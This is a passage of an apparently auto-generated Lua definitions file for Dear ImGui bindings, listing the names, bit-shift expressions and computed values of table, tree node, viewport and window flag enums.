defs["enums"]["ImGuiTableColumnFlags_"][4]["calc_value"] = 4
defs["enums"]["ImGuiTableColumnFlags_"][4]["name"] = "ImGuiTableColumnFlags_WidthStretch"
defs["enums"]["ImGuiTableColumnFlags_"][4]["value"] = "1 << 2"
defs["enums"]["ImGuiTableColumnFlags_"][5] = {}
defs["enums"]["ImGuiTableColumnFlags_"][5]["calc_value"] = 8
defs["enums"]["ImGuiTableColumnFlags_"][5]["name"] = "ImGuiTableColumnFlags_WidthFixed"
defs["enums"]["ImGuiTableColumnFlags_"][5]["value"] = "1 << 3"
defs["enums"]["ImGuiTableColumnFlags_"][6] = {}
defs["enums"]["ImGuiTableColumnFlags_"][6]["calc_value"] = 16
defs["enums"]["ImGuiTableColumnFlags_"][6]["name"] = "ImGuiTableColumnFlags_NoResize"
defs["enums"]["ImGuiTableColumnFlags_"][6]["value"] = "1 << 4"
defs["enums"]["ImGuiTableColumnFlags_"][7] = {}
defs["enums"]["ImGuiTableColumnFlags_"][7]["calc_value"] = 32
defs["enums"]["ImGuiTableColumnFlags_"][7]["name"] = "ImGuiTableColumnFlags_NoReorder"
defs["enums"]["ImGuiTableColumnFlags_"][7]["value"] = "1 << 5"
defs["enums"]["ImGuiTableColumnFlags_"][8] = {}
defs["enums"]["ImGuiTableColumnFlags_"][8]["calc_value"] = 64
defs["enums"]["ImGuiTableColumnFlags_"][8]["name"] = "ImGuiTableColumnFlags_NoHide"
defs["enums"]["ImGuiTableColumnFlags_"][8]["value"] = "1 << 6"
defs["enums"]["ImGuiTableColumnFlags_"][9] = {}
defs["enums"]["ImGuiTableColumnFlags_"][9]["calc_value"] = 128
defs["enums"]["ImGuiTableColumnFlags_"][9]["name"] = "ImGuiTableColumnFlags_NoClip"
defs["enums"]["ImGuiTableColumnFlags_"][9]["value"] = "1 << 7"
defs["enums"]["ImGuiTableColumnFlags_"][10] = {}
defs["enums"]["ImGuiTableColumnFlags_"][10]["calc_value"] = 256
defs["enums"]["ImGuiTableColumnFlags_"][10]["name"] = "ImGuiTableColumnFlags_NoSort"
defs["enums"]["ImGuiTableColumnFlags_"][10]["value"] = "1 << 8"
defs["enums"]["ImGuiTableColumnFlags_"][11] = {}
defs["enums"]["ImGuiTableColumnFlags_"][11]["calc_value"] = 512
defs["enums"]["ImGuiTableColumnFlags_"][11]["name"] = "ImGuiTableColumnFlags_NoSortAscending"
defs["enums"]["ImGuiTableColumnFlags_"][11]["value"] = "1 << 9"
defs["enums"]["ImGuiTableColumnFlags_"][12] = {}
defs["enums"]["ImGuiTableColumnFlags_"][12]["calc_value"] = 1024
defs["enums"]["ImGuiTableColumnFlags_"][12]["name"] = "ImGuiTableColumnFlags_NoSortDescending"
defs["enums"]["ImGuiTableColumnFlags_"][12]["value"] = "1 << 10"
defs["enums"]["ImGuiTableColumnFlags_"][13] = {}
defs["enums"]["ImGuiTableColumnFlags_"][13]["calc_value"] = 2048
defs["enums"]["ImGuiTableColumnFlags_"][13]["name"] = "ImGuiTableColumnFlags_NoHeaderWidth"
defs["enums"]["ImGuiTableColumnFlags_"][13]["value"] = "1 << 11"
defs["enums"]["ImGuiTableColumnFlags_"][14] = {}
defs["enums"]["ImGuiTableColumnFlags_"][14]["calc_value"] = 4096
defs["enums"]["ImGuiTableColumnFlags_"][14]["name"] = "ImGuiTableColumnFlags_PreferSortAscending"
defs["enums"]["ImGuiTableColumnFlags_"][14]["value"] = "1 << 12"
defs["enums"]["ImGuiTableColumnFlags_"][15] = {}
defs["enums"]["ImGuiTableColumnFlags_"][15]["calc_value"] = 8192
defs["enums"]["ImGuiTableColumnFlags_"][15]["name"] = "ImGuiTableColumnFlags_PreferSortDescending"
defs["enums"]["ImGuiTableColumnFlags_"][15]["value"] = "1 << 13"
defs["enums"]["ImGuiTableColumnFlags_"][16] = {}
defs["enums"]["ImGuiTableColumnFlags_"][16]["calc_value"] = 16384
defs["enums"]["ImGuiTableColumnFlags_"][16]["name"] = "ImGuiTableColumnFlags_IndentEnable"
defs["enums"]["ImGuiTableColumnFlags_"][16]["value"] = "1 << 14"
defs["enums"]["ImGuiTableColumnFlags_"][17] = {}
defs["enums"]["ImGuiTableColumnFlags_"][17]["calc_value"] = 32768
defs["enums"]["ImGuiTableColumnFlags_"][17]["name"] = "ImGuiTableColumnFlags_IndentDisable"
defs["enums"]["ImGuiTableColumnFlags_"][17]["value"] = "1 << 15"
defs["enums"]["ImGuiTableColumnFlags_"][18] = {}
defs["enums"]["ImGuiTableColumnFlags_"][18]["calc_value"] = 1048576
defs["enums"]["ImGuiTableColumnFlags_"][18]["name"] = "ImGuiTableColumnFlags_IsEnabled"
defs["enums"]["ImGuiTableColumnFlags_"][18]["value"] = "1 << 20"
defs["enums"]["ImGuiTableColumnFlags_"][19] = {}
defs["enums"]["ImGuiTableColumnFlags_"][19]["calc_value"] = 2097152
defs["enums"]["ImGuiTableColumnFlags_"][19]["name"] = "ImGuiTableColumnFlags_IsVisible"
defs["enums"]["ImGuiTableColumnFlags_"][19]["value"] = "1 << 21"
defs["enums"]["ImGuiTableColumnFlags_"][20] = {}
defs["enums"]["ImGuiTableColumnFlags_"][20]["calc_value"] = 4194304
defs["enums"]["ImGuiTableColumnFlags_"][20]["name"] = "ImGuiTableColumnFlags_IsSorted"
defs["enums"]["ImGuiTableColumnFlags_"][20]["value"] = "1 << 22"
defs["enums"]["ImGuiTableColumnFlags_"][21] = {}
defs["enums"]["ImGuiTableColumnFlags_"][21]["calc_value"] = 8388608
defs["enums"]["ImGuiTableColumnFlags_"][21]["name"] = "ImGuiTableColumnFlags_IsHovered"
defs["enums"]["ImGuiTableColumnFlags_"][21]["value"] = "1 << 23"
defs["enums"]["ImGuiTableColumnFlags_"][22] = {}
defs["enums"]["ImGuiTableColumnFlags_"][22]["calc_value"] = 12
defs["enums"]["ImGuiTableColumnFlags_"][22]["name"] = "ImGuiTableColumnFlags_WidthMask_"
defs["enums"]["ImGuiTableColumnFlags_"][22]["value"] = "ImGuiTableColumnFlags_WidthStretch | ImGuiTableColumnFlags_WidthFixed"
defs["enums"]["ImGuiTableColumnFlags_"][23] = {}
defs["enums"]["ImGuiTableColumnFlags_"][23]["calc_value"] = 49152
defs["enums"]["ImGuiTableColumnFlags_"][23]["name"] = "ImGuiTableColumnFlags_IndentMask_"
defs["enums"]["ImGuiTableColumnFlags_"][23]["value"] = "ImGuiTableColumnFlags_IndentEnable | ImGuiTableColumnFlags_IndentDisable"
defs["enums"]["ImGuiTableColumnFlags_"][24] = {}
defs["enums"]["ImGuiTableColumnFlags_"][24]["calc_value"] = 15728640
defs["enums"]["ImGuiTableColumnFlags_"][24]["name"] = "ImGuiTableColumnFlags_StatusMask_"
defs["enums"]["ImGuiTableColumnFlags_"][24]["value"] = "ImGuiTableColumnFlags_IsEnabled | ImGuiTableColumnFlags_IsVisible | ImGuiTableColumnFlags_IsSorted | ImGuiTableColumnFlags_IsHovered"
defs["enums"]["ImGuiTableColumnFlags_"][25] = {}
defs["enums"]["ImGuiTableColumnFlags_"][25]["calc_value"] = 1073741824
defs["enums"]["ImGuiTableColumnFlags_"][25]["name"] = "ImGuiTableColumnFlags_NoDirectResize_"
defs["enums"]["ImGuiTableColumnFlags_"][25]["value"] = "1 << 30"
defs["enums"]["ImGuiTableFlags_"] = {}
defs["enums"]["ImGuiTableFlags_"][1] = {}
defs["enums"]["ImGuiTableFlags_"][1]["calc_value"] = 0
defs["enums"]["ImGuiTableFlags_"][1]["name"] = "ImGuiTableFlags_None"
defs["enums"]["ImGuiTableFlags_"][1]["value"] = "0"
defs["enums"]["ImGuiTableFlags_"][2] = {}
defs["enums"]["ImGuiTableFlags_"][2]["calc_value"] = 1
defs["enums"]["ImGuiTableFlags_"][2]["name"] = "ImGuiTableFlags_Resizable"
defs["enums"]["ImGuiTableFlags_"][2]["value"] = "1 << 0"
defs["enums"]["ImGuiTableFlags_"][3] = {}
defs["enums"]["ImGuiTableFlags_"][3]["calc_value"] = 2
defs["enums"]["ImGuiTableFlags_"][3]["name"] = "ImGuiTableFlags_Reorderable"
defs["enums"]["ImGuiTableFlags_"][3]["value"] = "1 << 1"
defs["enums"]["ImGuiTableFlags_"][4] = {}
defs["enums"]["ImGuiTableFlags_"][4]["calc_value"] = 4
defs["enums"]["ImGuiTableFlags_"][4]["name"] = "ImGuiTableFlags_Hideable"
defs["enums"]["ImGuiTableFlags_"][4]["value"] = "1 << 2"
defs["enums"]["ImGuiTableFlags_"][5] = {}
defs["enums"]["ImGuiTableFlags_"][5]["calc_value"] = 8
defs["enums"]["ImGuiTableFlags_"][5]["name"] = "ImGuiTableFlags_Sortable"
defs["enums"]["ImGuiTableFlags_"][5]["value"] = "1 << 3"
defs["enums"]["ImGuiTableFlags_"][6] = {}
defs["enums"]["ImGuiTableFlags_"][6]["calc_value"] = 16
defs["enums"]["ImGuiTableFlags_"][6]["name"] = "ImGuiTableFlags_NoSavedSettings"
defs["enums"]["ImGuiTableFlags_"][6]["value"] = "1 << 4"
defs["enums"]["ImGuiTableFlags_"][7] = {}
defs["enums"]["ImGuiTableFlags_"][7]["calc_value"] = 32
defs["enums"]["ImGuiTableFlags_"][7]["name"] = "ImGuiTableFlags_ContextMenuInBody"
defs["enums"]["ImGuiTableFlags_"][7]["value"] = "1 << 5"
defs["enums"]["ImGuiTableFlags_"][8] = {}
defs["enums"]["ImGuiTableFlags_"][8]["calc_value"] = 64
defs["enums"]["ImGuiTableFlags_"][8]["name"] = "ImGuiTableFlags_RowBg"
defs["enums"]["ImGuiTableFlags_"][8]["value"] = "1 << 6"
defs["enums"]["ImGuiTableFlags_"][9] = {}
defs["enums"]["ImGuiTableFlags_"][9]["calc_value"] = 128
defs["enums"]["ImGuiTableFlags_"][9]["name"] = "ImGuiTableFlags_BordersInnerH"
defs["enums"]["ImGuiTableFlags_"][9]["value"] = "1 << 7"
defs["enums"]["ImGuiTableFlags_"][10] = {}
defs["enums"]["ImGuiTableFlags_"][10]["calc_value"] = 256
defs["enums"]["ImGuiTableFlags_"][10]["name"] = "ImGuiTableFlags_BordersOuterH"
defs["enums"]["ImGuiTableFlags_"][10]["value"] = "1 << 8"
defs["enums"]["ImGuiTableFlags_"][11] = {}
defs["enums"]["ImGuiTableFlags_"][11]["calc_value"] = 512
defs["enums"]["ImGuiTableFlags_"][11]["name"] = "ImGuiTableFlags_BordersInnerV"
defs["enums"]["ImGuiTableFlags_"][11]["value"] = "1 << 9"
defs["enums"]["ImGuiTableFlags_"][12] = {}
defs["enums"]["ImGuiTableFlags_"][12]["calc_value"] = 1024
defs["enums"]["ImGuiTableFlags_"][12]["name"] = "ImGuiTableFlags_BordersOuterV"
defs["enums"]["ImGuiTableFlags_"][12]["value"] = "1 << 10"
defs["enums"]["ImGuiTableFlags_"][13] = {}
defs["enums"]["ImGuiTableFlags_"][13]["calc_value"] = 384
defs["enums"]["ImGuiTableFlags_"][13]["name"] = "ImGuiTableFlags_BordersH"
defs["enums"]["ImGuiTableFlags_"][13]["value"] = "ImGuiTableFlags_BordersInnerH | ImGuiTableFlags_BordersOuterH"
defs["enums"]["ImGuiTableFlags_"][14] = {}
defs["enums"]["ImGuiTableFlags_"][14]["calc_value"] = 1536
defs["enums"]["ImGuiTableFlags_"][14]["name"] = "ImGuiTableFlags_BordersV"
defs["enums"]["ImGuiTableFlags_"][14]["value"] = "ImGuiTableFlags_BordersInnerV | ImGuiTableFlags_BordersOuterV"
defs["enums"]["ImGuiTableFlags_"][15] = {}
defs["enums"]["ImGuiTableFlags_"][15]["calc_value"] = 640
defs["enums"]["ImGuiTableFlags_"][15]["name"] = "ImGuiTableFlags_BordersInner"
defs["enums"]["ImGuiTableFlags_"][15]["value"] = "ImGuiTableFlags_BordersInnerV | ImGuiTableFlags_BordersInnerH"
defs["enums"]["ImGuiTableFlags_"][16] = {}
defs["enums"]["ImGuiTableFlags_"][16]["calc_value"] = 1280
defs["enums"]["ImGuiTableFlags_"][16]["name"] = "ImGuiTableFlags_BordersOuter"
defs["enums"]["ImGuiTableFlags_"][16]["value"] = "ImGuiTableFlags_BordersOuterV | ImGuiTableFlags_BordersOuterH"
defs["enums"]["ImGuiTableFlags_"][17] = {}
defs["enums"]["ImGuiTableFlags_"][17]["calc_value"] = 1920
defs["enums"]["ImGuiTableFlags_"][17]["name"] = "ImGuiTableFlags_Borders"
defs["enums"]["ImGuiTableFlags_"][17]["value"] = "ImGuiTableFlags_BordersInner | ImGuiTableFlags_BordersOuter"
defs["enums"]["ImGuiTableFlags_"][18] = {}
defs["enums"]["ImGuiTableFlags_"][18]["calc_value"] = 2048
defs["enums"]["ImGuiTableFlags_"][18]["name"] = "ImGuiTableFlags_NoBordersInBody"
defs["enums"]["ImGuiTableFlags_"][18]["value"] = "1 << 11"
defs["enums"]["ImGuiTableFlags_"][19] = {}
defs["enums"]["ImGuiTableFlags_"][19]["calc_value"] = 4096
defs["enums"]["ImGuiTableFlags_"][19]["name"] = "ImGuiTableFlags_NoBordersInBodyUntilResize"
defs["enums"]["ImGuiTableFlags_"][19]["value"] = "1 << 12"
defs["enums"]["ImGuiTableFlags_"][20] = {}
defs["enums"]["ImGuiTableFlags_"][20]["calc_value"] = 8192
defs["enums"]["ImGuiTableFlags_"][20]["name"] = "ImGuiTableFlags_SizingFixedFit"
defs["enums"]["ImGuiTableFlags_"][20]["value"] = "1 << 13"
defs["enums"]["ImGuiTableFlags_"][21] = {}
defs["enums"]["ImGuiTableFlags_"][21]["calc_value"] = 16384
defs["enums"]["ImGuiTableFlags_"][21]["name"] = "ImGuiTableFlags_SizingFixedSame"
defs["enums"]["ImGuiTableFlags_"][21]["value"] = "2 << 13"
defs["enums"]["ImGuiTableFlags_"][22] = {}
defs["enums"]["ImGuiTableFlags_"][22]["calc_value"] = 24576
defs["enums"]["ImGuiTableFlags_"][22]["name"] = "ImGuiTableFlags_SizingStretchProp"
defs["enums"]["ImGuiTableFlags_"][22]["value"] = "3 << 13"
defs["enums"]["ImGuiTableFlags_"][23] = {}
defs["enums"]["ImGuiTableFlags_"][23]["calc_value"] = 32768
defs["enums"]["ImGuiTableFlags_"][23]["name"] = "ImGuiTableFlags_SizingStretchSame"
defs["enums"]["ImGuiTableFlags_"][23]["value"] = "4 << 13"
defs["enums"]["ImGuiTableFlags_"][24] = {}
defs["enums"]["ImGuiTableFlags_"][24]["calc_value"] = 65536
defs["enums"]["ImGuiTableFlags_"][24]["name"] = "ImGuiTableFlags_NoHostExtendX"
defs["enums"]["ImGuiTableFlags_"][24]["value"] = "1 << 16"
defs["enums"]["ImGuiTableFlags_"][25] = {}
defs["enums"]["ImGuiTableFlags_"][25]["calc_value"] = 131072
defs["enums"]["ImGuiTableFlags_"][25]["name"] = "ImGuiTableFlags_NoHostExtendY"
defs["enums"]["ImGuiTableFlags_"][25]["value"] = "1 << 17"
defs["enums"]["ImGuiTableFlags_"][26] = {}
defs["enums"]["ImGuiTableFlags_"][26]["calc_value"] = 262144
defs["enums"]["ImGuiTableFlags_"][26]["name"] = "ImGuiTableFlags_NoKeepColumnsVisible"
defs["enums"]["ImGuiTableFlags_"][26]["value"] = "1 << 18"
defs["enums"]["ImGuiTableFlags_"][27] = {}
defs["enums"]["ImGuiTableFlags_"][27]["calc_value"] = 524288
defs["enums"]["ImGuiTableFlags_"][27]["name"] = "ImGuiTableFlags_PreciseWidths"
defs["enums"]["ImGuiTableFlags_"][27]["value"] = "1 << 19"
defs["enums"]["ImGuiTableFlags_"][28] = {}
defs["enums"]["ImGuiTableFlags_"][28]["calc_value"] = 1048576
defs["enums"]["ImGuiTableFlags_"][28]["name"] = "ImGuiTableFlags_NoClip"
defs["enums"]["ImGuiTableFlags_"][28]["value"] = "1 << 20"
defs["enums"]["ImGuiTableFlags_"][29] = {}
defs["enums"]["ImGuiTableFlags_"][29]["calc_value"] = 2097152
defs["enums"]["ImGuiTableFlags_"][29]["name"] = "ImGuiTableFlags_PadOuterX"
defs["enums"]["ImGuiTableFlags_"][29]["value"] = "1 << 21"
defs["enums"]["ImGuiTableFlags_"][30] = {}
defs["enums"]["ImGuiTableFlags_"][30]["calc_value"] = 4194304
defs["enums"]["ImGuiTableFlags_"][30]["name"] = "ImGuiTableFlags_NoPadOuterX"
defs["enums"]["ImGuiTableFlags_"][30]["value"] = "1 << 22"
defs["enums"]["ImGuiTableFlags_"][31] = {}
defs["enums"]["ImGuiTableFlags_"][31]["calc_value"] = 8388608
defs["enums"]["ImGuiTableFlags_"][31]["name"] = "ImGuiTableFlags_NoPadInnerX"
defs["enums"]["ImGuiTableFlags_"][31]["value"] = "1 << 23"
defs["enums"]["ImGuiTableFlags_"][32] = {}
defs["enums"]["ImGuiTableFlags_"][32]["calc_value"] = 16777216
defs["enums"]["ImGuiTableFlags_"][32]["name"] = "ImGuiTableFlags_ScrollX"
defs["enums"]["ImGuiTableFlags_"][32]["value"] = "1 << 24"
defs["enums"]["ImGuiTableFlags_"][33] = {}
defs["enums"]["ImGuiTableFlags_"][33]["calc_value"] = 33554432
defs["enums"]["ImGuiTableFlags_"][33]["name"] = "ImGuiTableFlags_ScrollY"
defs["enums"]["ImGuiTableFlags_"][33]["value"] = "1 << 25"
defs["enums"]["ImGuiTableFlags_"][34] = {}
defs["enums"]["ImGuiTableFlags_"][34]["calc_value"] = 67108864
defs["enums"]["ImGuiTableFlags_"][34]["name"] = "ImGuiTableFlags_SortMulti"
defs["enums"]["ImGuiTableFlags_"][34]["value"] = "1 << 26"
defs["enums"]["ImGuiTableFlags_"][35] = {}
defs["enums"]["ImGuiTableFlags_"][35]["calc_value"] = 134217728
defs["enums"]["ImGuiTableFlags_"][35]["name"] = "ImGuiTableFlags_SortTristate"
defs["enums"]["ImGuiTableFlags_"][35]["value"] = "1 << 27"
defs["enums"]["ImGuiTableFlags_"][36] = {}
defs["enums"]["ImGuiTableFlags_"][36]["calc_value"] = 57344
defs["enums"]["ImGuiTableFlags_"][36]["name"] = "ImGuiTableFlags_SizingMask_"
defs["enums"]["ImGuiTableFlags_"][36]["value"] = "ImGuiTableFlags_SizingFixedFit | ImGuiTableFlags_SizingFixedSame | ImGuiTableFlags_SizingStretchProp | ImGuiTableFlags_SizingStretchSame"
defs["enums"]["ImGuiTableRowFlags_"] = {}
defs["enums"]["ImGuiTableRowFlags_"][1] = {}
defs["enums"]["ImGuiTableRowFlags_"][1]["calc_value"] = 0
defs["enums"]["ImGuiTableRowFlags_"][1]["name"] = "ImGuiTableRowFlags_None"
defs["enums"]["ImGuiTableRowFlags_"][1]["value"] = "0"
defs["enums"]["ImGuiTableRowFlags_"][2] = {}
defs["enums"]["ImGuiTableRowFlags_"][2]["calc_value"] = 1
defs["enums"]["ImGuiTableRowFlags_"][2]["name"] = "ImGuiTableRowFlags_Headers"
defs["enums"]["ImGuiTableRowFlags_"][2]["value"] = "1 << 0"
defs["enums"]["ImGuiTreeNodeFlags_"] = {}
defs["enums"]["ImGuiTreeNodeFlags_"][1] = {}
defs["enums"]["ImGuiTreeNodeFlags_"][1]["calc_value"] = 0
defs["enums"]["ImGuiTreeNodeFlags_"][1]["name"] = "ImGuiTreeNodeFlags_None"
defs["enums"]["ImGuiTreeNodeFlags_"][1]["value"] = "0"
defs["enums"]["ImGuiTreeNodeFlags_"][2] = {}
defs["enums"]["ImGuiTreeNodeFlags_"][2]["calc_value"] = 1
defs["enums"]["ImGuiTreeNodeFlags_"][2]["name"] = "ImGuiTreeNodeFlags_Selected"
defs["enums"]["ImGuiTreeNodeFlags_"][2]["value"] = "1 << 0"
defs["enums"]["ImGuiTreeNodeFlags_"][3] = {}
defs["enums"]["ImGuiTreeNodeFlags_"][3]["calc_value"] = 2
defs["enums"]["ImGuiTreeNodeFlags_"][3]["name"] = "ImGuiTreeNodeFlags_Framed"
defs["enums"]["ImGuiTreeNodeFlags_"][3]["value"] = "1 << 1"
defs["enums"]["ImGuiTreeNodeFlags_"][4] = {}
defs["enums"]["ImGuiTreeNodeFlags_"][4]["calc_value"] = 4
defs["enums"]["ImGuiTreeNodeFlags_"][4]["name"] = "ImGuiTreeNodeFlags_AllowItemOverlap"
defs["enums"]["ImGuiTreeNodeFlags_"][4]["value"] = "1 << 2"
defs["enums"]["ImGuiTreeNodeFlags_"][5] = {}
defs["enums"]["ImGuiTreeNodeFlags_"][5]["calc_value"] = 8
defs["enums"]["ImGuiTreeNodeFlags_"][5]["name"] = "ImGuiTreeNodeFlags_NoTreePushOnOpen"
defs["enums"]["ImGuiTreeNodeFlags_"][5]["value"] = "1 << 3"
defs["enums"]["ImGuiTreeNodeFlags_"][6] = {}
defs["enums"]["ImGuiTreeNodeFlags_"][6]["calc_value"] = 16
defs["enums"]["ImGuiTreeNodeFlags_"][6]["name"] = "ImGuiTreeNodeFlags_NoAutoOpenOnLog"
defs["enums"]["ImGuiTreeNodeFlags_"][6]["value"] = "1 << 4"
defs["enums"]["ImGuiTreeNodeFlags_"][7] = {}
defs["enums"]["ImGuiTreeNodeFlags_"][7]["calc_value"] = 32
defs["enums"]["ImGuiTreeNodeFlags_"][7]["name"] = "ImGuiTreeNodeFlags_DefaultOpen"
defs["enums"]["ImGuiTreeNodeFlags_"][7]["value"] = "1 << 5"
defs["enums"]["ImGuiTreeNodeFlags_"][8] = {}
defs["enums"]["ImGuiTreeNodeFlags_"][8]["calc_value"] = 64
defs["enums"]["ImGuiTreeNodeFlags_"][8]["name"] = "ImGuiTreeNodeFlags_OpenOnDoubleClick"
defs["enums"]["ImGuiTreeNodeFlags_"][8]["value"] = "1 << 6"
defs["enums"]["ImGuiTreeNodeFlags_"][9] = {}
defs["enums"]["ImGuiTreeNodeFlags_"][9]["calc_value"] = 128
defs["enums"]["ImGuiTreeNodeFlags_"][9]["name"] = "ImGuiTreeNodeFlags_OpenOnArrow"
defs["enums"]["ImGuiTreeNodeFlags_"][9]["value"] = "1 << 7"
defs["enums"]["ImGuiTreeNodeFlags_"][10] = {}
defs["enums"]["ImGuiTreeNodeFlags_"][10]["calc_value"] = 256
defs["enums"]["ImGuiTreeNodeFlags_"][10]["name"] = "ImGuiTreeNodeFlags_Leaf"
defs["enums"]["ImGuiTreeNodeFlags_"][10]["value"] = "1 << 8"
defs["enums"]["ImGuiTreeNodeFlags_"][11] = {}
defs["enums"]["ImGuiTreeNodeFlags_"][11]["calc_value"] = 512
defs["enums"]["ImGuiTreeNodeFlags_"][11]["name"] = "ImGuiTreeNodeFlags_Bullet"
defs["enums"]["ImGuiTreeNodeFlags_"][11]["value"] = "1 << 9"
defs["enums"]["ImGuiTreeNodeFlags_"][12] = {}
defs["enums"]["ImGuiTreeNodeFlags_"][12]["calc_value"] = 1024
defs["enums"]["ImGuiTreeNodeFlags_"][12]["name"] = "ImGuiTreeNodeFlags_FramePadding"
defs["enums"]["ImGuiTreeNodeFlags_"][12]["value"] = "1 << 10"
defs["enums"]["ImGuiTreeNodeFlags_"][13] = {}
defs["enums"]["ImGuiTreeNodeFlags_"][13]["calc_value"] = 2048
defs["enums"]["ImGuiTreeNodeFlags_"][13]["name"] = "ImGuiTreeNodeFlags_SpanAvailWidth"
defs["enums"]["ImGuiTreeNodeFlags_"][13]["value"] = "1 << 11"
defs["enums"]["ImGuiTreeNodeFlags_"][14] = {}
defs["enums"]["ImGuiTreeNodeFlags_"][14]["calc_value"] = 4096
defs["enums"]["ImGuiTreeNodeFlags_"][14]["name"] = "ImGuiTreeNodeFlags_SpanFullWidth"
defs["enums"]["ImGuiTreeNodeFlags_"][14]["value"] = "1 << 12"
defs["enums"]["ImGuiTreeNodeFlags_"][15] = {}
defs["enums"]["ImGuiTreeNodeFlags_"][15]["calc_value"] = 8192
defs["enums"]["ImGuiTreeNodeFlags_"][15]["name"] = "ImGuiTreeNodeFlags_NavLeftJumpsBackHere"
defs["enums"]["ImGuiTreeNodeFlags_"][15]["value"] = "1 << 13"
defs["enums"]["ImGuiTreeNodeFlags_"][16] = {}
defs["enums"]["ImGuiTreeNodeFlags_"][16]["calc_value"] = 26
defs["enums"]["ImGuiTreeNodeFlags_"][16]["name"] = "ImGuiTreeNodeFlags_CollapsingHeader"
defs["enums"]["ImGuiTreeNodeFlags_"][16]["value"] = "ImGuiTreeNodeFlags_Framed | ImGuiTreeNodeFlags_NoTreePushOnOpen | ImGuiTreeNodeFlags_NoAutoOpenOnLog"
defs["enums"]["ImGuiViewportFlags_"] = {}
defs["enums"]["ImGuiViewportFlags_"][1] = {}
defs["enums"]["ImGuiViewportFlags_"][1]["calc_value"] = 0
defs["enums"]["ImGuiViewportFlags_"][1]["name"] = "ImGuiViewportFlags_None"
defs["enums"]["ImGuiViewportFlags_"][1]["value"] = "0"
defs["enums"]["ImGuiViewportFlags_"][2] = {}
defs["enums"]["ImGuiViewportFlags_"][2]["calc_value"] = 1
defs["enums"]["ImGuiViewportFlags_"][2]["name"] = "ImGuiViewportFlags_IsPlatformWindow"
defs["enums"]["ImGuiViewportFlags_"][2]["value"] = "1 << 0"
defs["enums"]["ImGuiViewportFlags_"][3] = {}
defs["enums"]["ImGuiViewportFlags_"][3]["calc_value"] = 2
defs["enums"]["ImGuiViewportFlags_"][3]["name"] = "ImGuiViewportFlags_IsPlatformMonitor"
defs["enums"]["ImGuiViewportFlags_"][3]["value"] = "1 << 1"
defs["enums"]["ImGuiViewportFlags_"][4] = {}
defs["enums"]["ImGuiViewportFlags_"][4]["calc_value"] = 4
defs["enums"]["ImGuiViewportFlags_"][4]["name"] = "ImGuiViewportFlags_OwnedByApp"
defs["enums"]["ImGuiViewportFlags_"][4]["value"] = "1 << 2"
defs["enums"]["ImGuiWindowFlags_"] = {}
defs["enums"]["ImGuiWindowFlags_"][1] = {}
defs["enums"]["ImGuiWindowFlags_"][1]["calc_value"] = 0
defs["enums"]["ImGuiWindowFlags_"][1]["name"] = "ImGuiWindowFlags_None"
defs["enums"]["ImGuiWindowFlags_"][1]["value"] = "0"
defs["enums"]["ImGuiWindowFlags_"][2] = {}
defs["enums"]["ImGuiWindowFlags_"][2]["calc_value"] = 1
defs["enums"]["ImGuiWindowFlags_"][2]["name"] = "ImGuiWindowFlags_NoTitleBar"
defs["enums"]["ImGuiWindowFlags_"][2]["value"] = "1 << 0"
defs["enums"]["ImGuiWindowFlags_"][3] = {}
defs["enums"]["ImGuiWindowFlags_"][3]["calc_value"] = 2
defs["enums"]["ImGuiWindowFlags_"][3]["name"] = "ImGuiWindowFlags_NoResize"
defs["enums"]["ImGuiWindowFlags_"][3]["value"] = "1 << 1"
defs["enums"]["ImGuiWindowFlags_"][4] = {}
defs["enums"]["ImGuiWindowFlags_"][4]["calc_value"] = 4
defs["enums"]["ImGuiWindowFlags_"][4]["name"] = "ImGuiWindowFlags_NoMove"
defs["enums"]["ImGuiWindowFlags_"][4]["value"] = "1 << 2"
defs["enums"]["ImGuiWindowFlags_"][5] = {}
defs["enums"]["ImGuiWindowFlags_"][5]["calc_value"] = 8
defs["enums"]["ImGuiWindowFlags_"][5]["name"] = "ImGuiWindowFlags_NoScrollbar"
defs["enums"]["ImGuiWindowFlags_"][5]["value"] = "1 << 3"
defs["enums"]["ImGuiWindowFlags_"][6] = {}
defs["enums"]["ImGuiWindowFlags_"][6]["calc_value"] = 16
defs["enums"]["ImGuiWindowFlags_"][6]["name"] = "ImGuiWindowFlags_NoScrollWithMouse"
defs["enums"]["ImGuiWindowFlags_"][6]["value"] = "1 << 4"
defs["enums"]["ImGuiWindowFlags_"][7] = {}
defs["enums"]["ImGuiWindowFlags_"][7]["calc_value"] = 32
defs["enums"]["ImGuiWindowFlags_"][7]["name"] = "ImGuiWindowFlags_NoCollapse"
defs["enums"]["ImGuiWindowFlags_"][7]["value"] = "1 << 5"
defs["enums"]["ImGuiWindowFlags_"][8] = {}
defs["enums"]["ImGuiWindowFlags_"][8]["calc_value"] = 64
defs["enums"]["ImGuiWindowFlags_"][8]["name"] = "ImGuiWindowFlags_AlwaysAutoResize"
defs["enums"]["ImGuiWindowFlags_"][8]["value"] = "1 << 6"
defs["enums"]["ImGuiWindowFlags_"][9] = {}
defs["enums"]["ImGuiWindowFlags_"][9]["calc_value"] = 128
defs["enums"]["ImGuiWindowFlags_"][9]["name"] = "ImGuiWindowFlags_NoBackground"
defs["enums"]["ImGuiWindowFlags_"][9]["value"] = "1 << 7"
defs["enums"]["ImGuiWindowFlags_"][10] = {}
defs["enums"]["ImGuiWindowFlags_"][10]["calc_value"] = 256
defs["enums"]["ImGuiWindowFlags_"][10]["name"] = "ImGuiWindowFlags_NoSavedSettings"
defs["enums"]["ImGuiWindowFlags_"][10]["value"] = "1 << 8"
defs["enums"]["ImGuiWindowFlags_"][11] = {}
defs["enums"]["ImGuiWindowFlags_"][11]["calc_value"] = 512
defs["enums"]["ImGuiWindowFlags_"][11]["name"] = "ImGuiWindowFlags_NoMouseInputs"
defs["enums"]["ImGuiWindowFlags_"][11]["value"] = "1 << 9"
defs["enums"]["ImGuiWindowFlags_"][12] = {}
defs["enums"]["ImGuiWindowFlags_"][12]["calc_value"] = 1024
defs["enums"]["ImGuiWindowFlags_"][12]["name"] = "ImGuiWindowFlags_MenuBar"
defs["enums"]["ImGuiWindowFlags_"][12]["value"] = "1 << 10"
defs["enums"]["ImGuiWindowFlags_"][13] = {}
defs["enums"]["ImGuiWindowFlags_"][13]["calc_value"] = 2048
defs["enums"]["ImGuiWindowFlags_"][13]["name"] = "ImGuiWindowFlags_HorizontalScrollbar"
defs["enums"]["ImGuiWindowFlags_"][13]["value"] = "1 << 11"
defs["enums"]["ImGuiWindowFlags_"][14] = {}
defs["enums"]["ImGuiWindowFlags_"][14]["calc_value"] = 4096
defs["enums"]["ImGuiWindowFlags_"][14]["name"] = "ImGuiWindowFlags_NoFocusOnAppearing"
